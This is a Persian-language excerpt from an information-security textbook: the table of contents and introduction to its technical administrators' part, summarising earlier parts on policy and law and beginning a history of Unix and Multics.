ﻋﻤﻠﻴﺎﺕ ﺣﻔﺎﻇﺘﻲ ﻛﻪ "ﻻﺯﻡ" ﻭ "ﻗﺎﺑﻞ ﺗﻮﺟﻪ" ﻫﺴﺘﻨﺪ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ
ﻣﻲ ﻛﻨﻨﺪ .ﻧﻜﺎﺕ ﺍﺻﻠﻲ ﻗـﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘـﻲ ﻛـﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﺗﻮﺟـﻪ
ﻣﺆﺳﺴﺎﺕ ﻭﺍﻗﻊ ﺷﻮﻧﺪ ،ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﺍﺯ ﻣﺤﺮﻣﺎﻧﮕﻲ ،ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺍﻃﻼﻋﺎﺗﻲ •
ﻛﻪ ﺗﻮﺳﻂ ﻣﺆﺳﺴﻪ ﺍﻳﺠﺎﺩ ،ﺩﺭﻳﺎﻓﺖ ،ﻧﮕﻬـﺪﺍﺭﻱ ﻳـﺎ ﺍﻧﺘﻘـﺎﻝ
ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨﺎﻥ ﻛﻨﻴﺪ؛
ﺍﺯ ﺳﻴﺴﺘﻢ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺍﻣﻨﻴﺖ ﻳـﺎ ﻳﻜﭙـﺎﺭﭼﮕﻲ •
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﻪ ﺧﻄﺮ ﻣﻲﺍﻧﺪﺍﺯﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ؛
ﻓﺼﻞ .۱ﻣﻘﺪﻣﻪ
ﻓﺼﻞ .۲ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺭﺍﻫﱪﺍﻥ
ﻓﺼﻞ .۳ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ
ﻓﺼﻞ .۴ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ
ﻓﺼﻞ .۵ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ
ﻓﺼﻞ .۶ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ
ﻓﺼﻞ .۷ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ
ﻓﺼﻞ .۸ﺍﻧﻮﺍﻉ ﲪﻼﺕ ﻭ ﺭﻭﺵﻫﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﺎ
ﻓﺼﻞ .۹ﻛﺸﻒ ﻭﻣﺪﻳﺮﻳﺖ ﻧﻔﻮﺫ
ﻓﺼﻞ .۱۰ﻧﻜﺎﺕ ﻭﻳﮋﻩ ﺑﺴﺘﺮﻫﺎﻱ ﳐﺘﻠﻒ
٢٥٧ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻓﺼﻞ ﺍﻭﻝ
ﻣﻘﺪﻣﻪ
ﺧﻼﺻﻪ ﺑﺨﺸﻬﺎﻱ ۱ﺗﺎ ۴
ﺣﺎﻝ ﻛﻪ ﺑﻪ ﻓﻨﻲﺗﺮﻳﻦ ﻛﺘﺎﺏ ﺭﺳﻴﺪﻩﺍﻳﻢ ،ﻣﺮﻭﺭﻱ ﺑﺮ ﺁﻧﭽﻪ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ۱ﺗﺎ ۴ﺩﺭﺑﺎﺭﺓ ﺁﻥ ﺑﺤﺚ ﺷﺪ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺑﻪ ﻳﺎﺩ ﻣﻲﺁﻭﺭﻳﻢ ﻛﻪ:
ﺑﺨﺶ ۱ﻛﺘﺎﺏ ﻳﻚ ﻣﻌﺮﻓﻲ ﺍﺟﻤﺎﻟﻲ ﺍﺯ ﻣﺴﺎﺋﻞ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ ﺍﺭﺍﺋﻪ ﻛﺮﺩ .ﺍﻳﻦ ﺑﺨﺶ ﮔﺴﺘﺮﺓ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺖ ITﻭ ﺑﺮﺧـﻲ
ﺍﻋﻤﺎﻝ ﺗﺨﺎﺻﻢﺁﻣﻴﺰ ﺩﺭ ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺭﺍ ﺷﺮﺡ ﺩﺍﺩ ،ﻭ ﻣﺸﺨﺺ ﻛﺮﺩ ﻛﻪ ﭼـﺮﺍ ﺧـﻂ ﻣـﺸﻲﻫـﺎ ﻭ ﺩﺍﻧـﺶ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩ،
ﻣﺆﺳﺴﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ ،ﻳﺎ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺿﺮﻭﺭﻱ ﺍﺳﺖ.
ﺑﺨﺶ ۲ﺑﻪ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﻋﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﺷﺨﺼﻲ ،ﻣﻨﺎﺑﻊ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺷﺒﻜﻪ ﺍﺷﺎﺭﻩ ﺩﺍﺷﺖ .ﺍﻳﻦ ﺑﺨﺶ ﻣﺴﺎﺋﻞ ﻛﻠﻴﺪﻱ ﺍﻣﻨﻴﺖ ﺍﻧﻔﺮﺍﺩﻱ ﺭﺍ ﺩﺭ ﺑﺮ
ﮔﺮﻓﺖ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻳﻲ ﻓﻨﻲ ﺍﺭﺍﺋﻪ ﺩﺍﺩ ﻛﻪ ﺍﮔﺮ ﺩﺭﺳﺖ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ،ﺗﻬﺪﻳﺪ ﻧﻔﻮﺫ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﻣﻲﺭﺳﺎﻧﻨﺪ.
ﺑﺨﺶ ۳ﺟﻮﺍﻧﺐ ﺭﺍﻫﺒﺮﻱ ﻭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺳﺎﺯﻣﺎﻧﻲ ﭘﻮﺷﺶ ﺩﺍﺩ .ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﮔﻔﺘﻴﻢ ﺑﺎ ﻓﺮﺻﺘﻬﺎﻳﻲ ﻛﻪ ﺭﺳـﺎﻧﻪﻫـﺎﻱ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺟﺪﻳﺪ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﻨﺪ ،ﺑﻨﮕﺎﻫﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ )SMEﻫﺎ( ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺑـﻪ ﻃـﺮﻑ ﻧﻘﻄـﻪﺍﻱ
ﺣﺮﻛﺖ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺩﺭ ﺗﻮﺳﻌﺔ ﺑﺎﺯﺍﺭﻫﺎﻱ ﻓﻌﻠﻲ ﺟﻬﺎﻥ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺷﻮﻧﺪ .ﻭﺟﻮﺩ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﻨﺎﺳﺐ ﻭ ﺍﺟﺮﺍﻱ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ،
ﻣﺨﺎﻃﺮﺓ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﻭ ﻋﻤﺪﻱ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺧﻮﺍﻫﺪ ﺭﺳﺎﻧﺪ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺣﻤﻠﻪﻫﺎ ﻭ ﺗـﺮﻣﻴﻢ
ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺣﻮﺯﻩ SMEﻫﺎ ،ﻋﻨﺎﺻﺮﻱ ﭼﻮﻥ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺗﻌﺎﻣﻠﻲ ﺍﺯ ﻗﺒﻴﻞ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ .ﺍﻳـﻦ ﺑﺨـﺶ
ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺩﺍﺷﺖ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﻣﻘﺮﺭﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻣﺴﺘﺤﻜﻢ ﺭﺍ ﺩﺭ ﺣﻮﺯﺓ ﻣﺤﻴﻄﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺣﺎﻛﻢ ﻛﺮﺩ ﻭ ﮔﺴﺘﺮﺵ ﺩﺍﺩ.
ﺑﺨﺶ ۴ﺭﻭﻱ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻭ ﺍﺑﺘﻜﺎﺭﻫﺎﻱ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺗﺄﻛﻴﺪ ﺩﺍﺭﺩ؛ ﻭ ﺑﻴﺎﻥ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﺑﺎﻳﺪ ﺩﺭ ﺳﻄﺢ ﺩﻭﻟﺖ ﺩﺭﻙ ﺷﻮﺩ ﻭ ﺑﻪ
ﺍﺟﺮﺍ ﺩﺭﺁﻳﺪ .ﺩﻭﻟﺖ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺧﻮﺩ ،ﻣﻮﻇﻒ ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳـﺎﺯﻱ ﻭ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﻣﻠـﻲ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺍﻃﻼﻋﺎﺕ ﻧﻴﺰ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻛﻨﺪ .ﺩﻭﻟﺘﻬﺎ ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﭘﻴﺶﺑﻴﻨﻲ ﻛﻨﻨﺪ ﻛﻪ ﺭﺷﺪ ﺯﻳﺮﺳﺎﺧﺖ ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﻧﻈﺎﻡ ﺣﻘﻮﻗﻲ ﺁﻧﻬﺎ ﭼﻪ ﺗـﺄﺛﻴﺮﻱ
ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺍﻳﻦ ﺑﺨﺶ ﺑﺮﺧﻲ ﺍﺯ ﺳﺆﺍﻻﺕ ﻛﻠﻴﺪﻱ ﻛﻪ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﺍﻥ ﻭ ﺭﻫﺒـﺮﺍﻥ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ ﻫـﺴﺘﻨﺪ ﺭﺍ
ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻭ ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺟﺎﻣﻌﻪ ﺟﻬﺎﻧﻲ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﺪ ﻛﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑﻌﻨـﻮﺍﻥ ﺭﺍﻫﻨﻤـﺎ ﺑـﺮﺍﻱ ﻛـﺴﺎﻧﻲ ﻛـﻪ ﺩﺭﮔﻴـﺮ
ﺗﻼﺷﻬﺎﻱ ﺟﺪﻳﺪ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺑﺮﺍﻱ ﻓﻀﺎﻱ ﻣﺠﺎﺯﻱ ١ﻫﺴﺘﻨﺪ ﺑﻜﺎﺭ ﺁﻳﺪ.
ﻛﻨﺘﺮﻝ ﺗﺮﺍﻓﻴﻚ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺣﺴﺎﺱ ﻭ ﺷﺒﻜﻪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﺮﺍﻱ ﺣﻤﻠﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺩﺭﺻـﻮﺭﺕ ﺍﻣﻜـﺎﻥ •
ﺩﻓﻊ ﺷﻮﻧﺪ.
٢
ﺍﺭﺯﺷﮕﺬﺍﺭﻱ ﻧﺘﺎﻳﺞ ﺍﺭﺯﻳﺎﺑﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺯﻣﺎﻧﻴﻜﻪ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻓﺮﺁﻳﻨﺪﻫﺎ ﺩﺭﺣﺎﻝ ﺗﻮﻟﻴﺪ ﺷﺪﻥ ﻫﺴﺘﻨﺪ ﻭ ﺗﺤﻠﻴـﻞ ﻧﺘـﺎﻳﺞ ﺛﺒﺘﻬـﺎ ﻭ ﺳـﺎﻳﺮ •
ﻣﺪﺍﺭﻙ ﺟﺎﺭﻱ ﺑﻌﺪ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ.
ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻳﻚ ﺣﻤﻠﻪ ،ﺗﺮﻣﻴﻢ ﻳﻚ ﻧﻔﻮﺫ ،ﻭ ﻳﺎﺩﮔﻴﺮﻱ ﺍﺯ ﺗﺠﺮﺑﻴﺎﺕ ﮔﺬﺷﺘﻪ. •
ﺑﺨﺶ ۵ﺑﺎ ﭼﻬﺎﺭ ﺑﺨﺶ ﺩﻳﮕﺮ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺯ ﺁﻥ ﺟﻬﺖ ﺗﻔﺎﻭﺕ ﺩﺍﺭﺩ ﻛﻪ ﻓﺮﺽ ﻣﻲﻛﻨﺪ ﺧﻮﺍﻧﻨﺪﻩ ﺍﺯ ﺳﻄﺢ ﻣﻌﻴﻨﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻓﻨﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ
ﺍﺳﺖ .ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻣﻔﺎﻫﻴﻢ ﺑﻪ ﻭﺿﻮﺡ ﺷﺮﺡ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ ﻭ ﻫﺮﺟﺎ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺍﺷﺘﻪ ﻣﺜﺎﻟﻬﺎﺋﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ ،ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳـﻦ ﺑﺨـﺶ ﺑـﺮﺍﻱ
ﺍﻓﺮﺍﺩﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺍﺳﺖ ﻛﻪ ﺗﺠﺮﺑﺔ ﻛﺎﻓﻲ ﻛﺎﺭ ﺑﺎ ﺳﻴﺴﺘﻢ ﻭ ﺭﺍﻫﺒﺮﻱ ﺁﻥ ﺩﺍﺭﻧﺪ )ﻳﺎ ﺣﺪﺍﻗﻞ ﺑـﺴﻴﺎﺭ ﻋﻼﻗـﻪﻣﻨـﺪ ﺑـﻪ ﺁﻥ ﻫـﺴﺘﻨﺪ( .ﺑـﻪ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ
ﻋﻼﻗﻪﻣﻨﺪ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﺍﺯ ﺿﻤﺎﺋﻢ ﻛﺘﺎﺏ ﻛﻪ ﺑﻪ ﻣﺂﺧﺬ ﺍﺭﺯﺷﻤﻨﺪ ﻓﺮﺍﻭﺍﻧﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﻧﮕﻬﺪﺍﺭﻱ ﺭﺍﻳﺎﻧﻪ ﻭ ﺷﺒﻜﻪ ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻨﺪ.
ﻻ ﺑﻪ ﻣﺤﻴﻄﻬﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﺭﺍﻳﺎﻧﻪ ﻣﺮﺑﻮﻁ ﻫﺴﺘﻨﺪ ،ﺑﺨﺶ ۵ﺷﺎﻣﻞ ﻗﺴﻤﺘﻬﺎﻳﻲ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﻛـﻪ ﻣـﺴﺎﺋﻞ ﻧﻈﺮ ﺑﻪ ﺍﻳﻨﻜﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻣﻌﻤﻮ ﹰ
ﺍﻣﻨﻴﺘﻲ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻋﻤﺪﻩ ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ .ﮔﺮﭼﻪ ﻗﺴﻤﺖ ﻋﻤﺪﺓ ﺑﺨﺶ ۵ﺗﺎ
ﺟﺎﻳﻲ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺍﺷﺘﻪ ﻏﻴﺮ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺳﺖ ،ﺍﻣﺎ ﮔﺎﻫﻲ ﺍﺭﺟﺎﻉﻫﺎﻳﻲ ﻧﻴﺰ ﺑﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ،Unix ،Microsoft Windows
،Mac OS X ،Linuxﻭ ﺳﺎﻳﺮ ﮔﻮﻧﻪﻫﺎﻱ Unixﺭﻭﻣﻴﺰﻱ ٣ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭ ﻫﻤﺔ ﻣﻮﺍﺭﺩ ﺗﻮﺻﻴﻪﻫـﺎﻱ ﺭﻭﺷـﻨﻲ ﺩﺭﺑـﺎﺭﻩ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﻛـﻪ
ﻣﻲﺗﻮﺍﻥ ﻭ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑﻪﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻥ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻤﻲ ﺍﻧﺠﺎﻡ ﺩﺍﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ.
Unix
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ Unixﻭ ﺷﺒﻪ Unixﻣﺘﻨﻮﻋﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ )ﻛﻪ ﮔﺎﻩ ﻛﺎﻣ ﹰﻼ ﺑﺎ ﻫﻢ ﻣﺘﻔﺎﻭﺗﻨـﺪ( ﻭ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺘﻔﺎﻭﺗﻲ ﺗﻮﺯﻳـﻊ ﻣـﻲﺷـﻮﻧﺪ.
ﺩﻟﻴﻞ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻭ ﺗﺄﺛﻴﺮﺍﺕ ﺁﻥ ﻣﺴﺘﻠﺰﻡ ﻳﻚ ﻣﺮﻭﺭ ﻣﺨﺘﺼﺮ ﺗﺎﺭﻳﺨﻲ ﺍﺳﺖ.
ﺭﻳﺸﻪﻫﺎﻱ Unixﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ ﺑﻪ ﻃﺮﺡ Multicsﺩﺭ ﺍﻭﺍﺳﻂ ﺳـﺎﻟﻬﺎﻱ .۱۹۶۰ﺍﻳـﻦ ﭘـﺮﻭﮊﻩ ﻛـﻪ ﺑﻮﺳـﻴﻠﻪ ﺳـﺎﺯﻣﺎﻥ ﻃﺮﺣﻬـﺎﻱ ﺗﺤﻘﻴﻘـﺎﺗﻲ
ﭘﻴﺸﺮﻓﺘﻪ ﻭﺯﺍﺭﺕ ﺩﻓﺎﻉ ﺍﻳﺎﻟﺖ ﻣﺘﺤﺪﻩ ) DARPAﻳﺎ (ARPAﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺷﺪ ﺑﺮﺍﻱ ﺁﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻳﻜﭙﺎﺭﭼﻪ ﻣﺘﺸﻜﻞ
ﺍﺯ ﺑﺎﻧﻜﻬﺎﻳﻲ ﺑﺎﺷﺪ ﻛﻪ ﺣﺎﻭﻱ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎ ،ﺣﺎﻓﻈﻪ ،ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺎ ﺳﺮﻋﺖ ﺑﺎﻻ ﺑﻮﺩﻧﺪ .ﺑﺮﺍﺳـﺎﺱ ﺍﻳـﻦ ﻃﺮﺍﺣـﻲ ،ﺑﺨـﺸﻲ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ
ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺁﻧﻜﻪ ﺭﻭﻱ ﺩﻳﮕﺮ ﻗﺴﻤﺘﻬﺎ ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺗﺄﺛﻴﺮ ﺑﮕﺬﺍﺭﺩ ،ﺑﺮﺍﻱ ﺗﻌﻤﻴﺮﺍﺕ ﺧﺎﻣﻮﺵ ﺷﻮﺩ .ﮔﺮﭼﻪ ﺍﻣﺮﻭﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﻪ ﺳﺎﺩﮔﻲ ﻣﻴﺴﺮ
ﺍﺳﺖ ،ﺍﻣﺎ ﻫﻨﮕﺎﻣﻲ ﻛﻪ Multicsﺷﺮﻭﻉ ﺑﻪ ﻛﺎﺭ ﻛﺮﺩ ﭼﻨﻴﻦ ﻗﺎﺑﻠﻴﺘﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺖ Multics .ﺑﮕﻮﻧـﻪﺍﻱ ﻃﺮﺍﺣـﻲ ﺷـﺪ ﻛـﻪ ﻫـﻢ ﺩﺭ ﺑﺮﺍﺑـﺮ
ﺣﻤﻼﺕ ﺑﻴﺮﻭﻧﻲ ﻣﻘﺎﻭﻡ ﺑﺎﺷﺪ ﻭ ﻫﻢ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺍﺧﻠﻲ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺣﻔﺎﻇﺖ ﻛﻨـﺪ Multics .ﺑـﺎ ﻫـﺪﻑ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣﻔﻬـﻮﻡ ﺍﻣﻨﻴـﺖ
ﭼﻨﺪﺳﻄﺤﻲ ٤ﻃﺮﺍﺣﻲ ﺷﺪ Multics .ﺑﺎﻻﺧﺮﻩ ﺳﻄﺤﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﺧﺪﻣﺎﺕ ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﺮﺩ ﻛﻪ ﻫﻨﻮﺯ ﻫﻢ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﺑﻪ ﺁﻥ ﻧﺮﺳﻴﺪﻩﺍﻧﺪ.
ﺩﺭﺣﺎﻟﻴﻜﻪ Multicsﺳﻌﻲ ﺩﺍﺷﺖ ﻛﺎﺭﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺍﻧﺠﺎﻡ ﺩﻫﺪ Unix ،ﺗﻼﺵ ﻣﻲﻛﺮﺩ ﻳﻚ ﻛﺎﺭ ﺭﺍ ﺧﻮﺏ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ :ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪﻫـﺎ.
"ﺍﻣﻨﻴﺖ ﻗﻮﻱ" ﺑﺨﺸﻲ ﺍﺯ ﺍﻳﻦ ﻫﺪﻑ ﻧﺒﻮﺩ .ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺑﺮﺍﺳﺎﺱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻓﺸﺮﺩﻩﺳﺎﺯﻱﺷﺪﻩ ﻣﻮﺳﻮﻡ ﺑﻪ ﺍﺑﺰﺍﺭﻫﺎ ٥ﻛﺎﺭ ﻣﻲﻛﺮﺩ ﻛـﻪ ﻫﺮﻛـﺪﺍﻡ
ﻋﻤﻠﻴﺎﺕ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩﻱ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﺍﺩﻧـﺪ .ﺷـﺮﻛﺖ ﺗﻠﻔـﻦ ﻭ ﺗﻠﮕـﺮﺍﻑ ﺁﻣﺮﻳﻜـﺎ ) ٦(AT&Tﺩﺭ ﺧـﻼﻝ ﺳـﺎﻟﻬﺎﻱ ﺩﻫـﺔ ۱۹۷۰ﺍﺑﺰﺍﺭﻫـﺎ ﻭ
ﻭﻳﮋﮔﻴﻬﺎﺋﻲ ﺑﻪ ﺁﻥ ﺍﺿﺎﻓﻪ ﻛﺮﺩ .ﺩﺭ ﺳﺎﻝ ۱۹۷۳ﺗﺎﻣﺴﻮﻥ ٧ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ Unixﺭﺍ ﺑﻪ ﺯﺑﺎﻥ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ Cﻛﻪ ﺭﻳﭽﻲ ٨ﺑﻪ ﺗـﺎﺯﮔﻲ ﺁﻧـﺮﺍ
